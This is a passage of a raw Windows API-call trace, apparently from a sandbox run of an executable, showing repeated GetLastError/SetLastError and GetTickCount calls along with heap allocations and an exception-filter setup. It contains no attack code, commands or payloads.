(dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.116] GetLastError () returned 0x0 [0039.116] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.117] SetLastError (dwErrCode=0x0) [0039.117] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.118] SetLastError (dwErrCode=0x0) [0039.118] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.119] GetLastError () returned 0x0 [0039.119] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.120] SetLastError (dwErrCode=0x0) [0039.120] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.121] SetLastError (dwErrCode=0x0) [0039.121] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.122] GetLastError () returned 0x0 [0039.122] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.123] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.123] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.123] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.123] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.123] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.123] SetLastError (dwErrCode=0x0) [0039.123] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.124] SetLastError (dwErrCode=0x0) [0039.124] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.125] SetLastError (dwErrCode=0x0) [0039.125] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.126] SetLastError (dwErrCode=0x0) [0039.126] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.127] GetLastError () returned 0x0 [0039.127] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.128] SetLastError (dwErrCode=0x0) [0039.128] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.129] SetLastError (dwErrCode=0x0) [0039.129] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0xae) returned 0x861990 [0039.130] GetLastError () returned 0x0 [0039.130] SetLastError (dwErrCode=0x0) [0039.130] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.131] SetLastError (dwErrCode=0x0) [0039.131] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.132] SetLastError (dwErrCode=0x0) [0039.132] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.133] SetLastError (dwErrCode=0x0) [0039.133] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.134] SetLastError (dwErrCode=0x0) [0039.134] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.135] SetLastError (dwErrCode=0x0) [0039.135] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.136] SetLastError (dwErrCode=0x0) [0039.136] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.137] SetLastError (dwErrCode=0x0) [0039.137] GetLastError () returned 0x0 [0039.138] SetLastError (dwErrCode=0x0) [0039.138] GetLastError () returned 0x0 [0039.138] SetLastError (dwErrCode=0x0) [0039.138] GetLastError () returned 0x0 [0039.138] SetLastError (dwErrCode=0x0) [0039.138] GetLastError () returned 0x0 [0039.138] SetLastError (dwErrCode=0x0) [0039.138] GetLastError () returned 0x0 [0039.138] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.142] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.142] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.142] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.142] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.142] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.142] SetLastError (dwErrCode=0x0) [0039.142] GetLastError () returned 0x0 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x98) returned 0x861a48 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1f) returned 0x861ae8 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x36) returned 0x861b10 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x37) returned 0x861b50 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x3c) returned 0x861b90 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x31) returned 0x861bd8 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x17) returned 0x861c18 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x24) returned 0x861c38 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x14) returned 0x861c68 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xd) returned 0x861c88 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x25) returned 0x861ca0 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x39) returned 0x861cd0 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x18) returned 0x861d18 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x17) returned 0x861d38 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xe) returned 0x861d58 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x69) returned 0x861d70 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x3e) returned 0x861de8 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1b) returned 0x861e30 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1d) returned 0x861e58 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x48) returned 0x861e80 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x12) returned 0x861ed0 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x18) returned 0x861ef0 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1b) returned 0x861f10 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x24) returned 0x861f38 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x29) returned 0x861f68 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1e) returned 0x861fa0 [0039.143] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x41) returned 0x861fc8 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x17) returned 0x862018 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xf) returned 0x862038 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x16) returned 0x862050 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x2a) returned 0x862070 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x29) returned 0x8620a8 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x15) returned 0x8620e0 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1e) returned 0x862100 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x2a) returned 0x862128 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x12) returned 0x862160 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x18) returned 0x862180 [0039.144] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x46) returned 0x8621a0 [0039.144] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8611f8 | out: hHeap=0x860000) returned 1 [0039.144] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0039.144] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0039.144] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0039.145] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x80) returned 0x8611f8 [0039.146] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4037ad) returned 0x0 [0039.147] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x8611f8) returned 0x80 [0039.147] GetLastError () returned 0x0 [0039.172] lstrlenA (lpString="") returned 0 [0039.172] GetLastError () returned 0x0 [0039.172] GetTickCount () returned 0x114533f [0039.172] GetLastError () returned 0x0 [0039.172] GetTickCount () returned 0x114533f [0039.172] GetLastError () returned 0x0 [0039.172] GetTickCount () returned 0x114533f [0039.172] GetLastError () returned 0x0 [0039.172] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.173] GetTickCount () returned 0x114533f [0039.173] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.174] GetLastError () returned 0x0 [0039.174] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.175] GetTickCount () returned 0x114533f [0039.175] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.176] GetTickCount () returned 0x114533f [0039.176] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.177] GetLastError () returned 0x0 [0039.177] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 